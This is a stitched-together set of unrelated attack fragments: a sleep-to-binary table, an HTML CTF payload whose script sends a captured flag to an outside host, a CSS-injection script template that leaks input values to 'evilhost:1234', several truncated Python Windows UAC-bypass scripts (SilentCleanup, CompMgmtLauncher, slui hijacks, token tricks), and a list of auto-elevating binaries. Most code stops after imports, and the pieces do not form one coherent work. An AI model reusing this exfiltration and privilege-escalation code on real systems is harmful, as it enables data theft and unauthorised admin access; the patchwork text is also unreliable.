Sleep | Binary |
---|---|
15 | 1111 |
14 | 1110 |
13 | 1101 |
12 | 1100 |
11 | 1011 |
10 | 1010 |
9 | 1001 |
8 | 1000 |
```html
<iframe id="ifr0" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<iframe id="ifr1" src="https://matrona.club/?calc=A.B=B" width=1000 height=500 sandbox="allow-scripts allow-top-navigation allow-same-origin allow-forms"></iframe>
<script>
window.addEventListener('hashchange', (evt) => {
  const flag = evt.newURL.match(/CTF-BR\{.*\}/)[0]
  fetch(`//tool.tonkatsu.info/?flag=${encodeURIComponent(flag)}`)
})
</script>
```
```python
import time
import requests

host = 'evilhost:1234'
start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}'
triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}'
timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}'
frames = '''button{animation:l1 35s;}
```
```python
# -*- coding: utf-8 -*-
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
'''
SilentCleanup has a "Highest" RunLevel, meaning it will elevate the scheduled task to administrator without any prompting.
It also contains environment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe). The environment variables are stored in the HKCU registry hive (HKCU\Environment), which is write accessible by a user.
We can perform an AlwaysNotify UAC bypass by changing the environment variable 'windir' to our own payload and triggering it through the SilentCleanup scheduled task.
'''
from _winreg import *

HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
```
```python
# -*- coding: UTF-8 -*-
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum

# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
```
```python
# -*- coding: utf-8 -*-
# All credits go to https://github.com/mrfuzzy8/Scripts/blob/master/Invoke-CompMgmtLauncherBypass.ps1 and https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'''
CompMgmtLauncher.exe is an auto-elevated binary that is vulnerable to Image Hijack on the .msc file extension.
Read access to HKCU\Software\Classes\mscfile\shell\open\command is performed with "mmc.exe" as a default value, which then invokes eventvwr.msc; if "NAME NOT FOUND" it goes to HKCR\mscfile\shell\open\command.
Because the registry key is writable from user mode, an arbitrary file can be injected to be executed with High IL.
'''
from _winreg import *

HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
```
```python
# -*- coding: UTF-8 -*-
# All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum

# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)
```
```python
# -*- coding: utf-8 -*-
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :))
# This is truly an Always Notify UAC bypass, because it uses process enumeration to find elevated processes.
# Since you need administrative privileges to query TOKEN_ELEVATION, we look for processes whose manifests
# have <autoElevate></autoElevate> set to true.
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum

kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32 = WinDLL('shell32', use_last_error=True)
```
```python
# -*- coding: utf-8 -*-
# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation
'''
slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
'''
from _winreg import *

HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
```
```text
C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate>
C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate>
```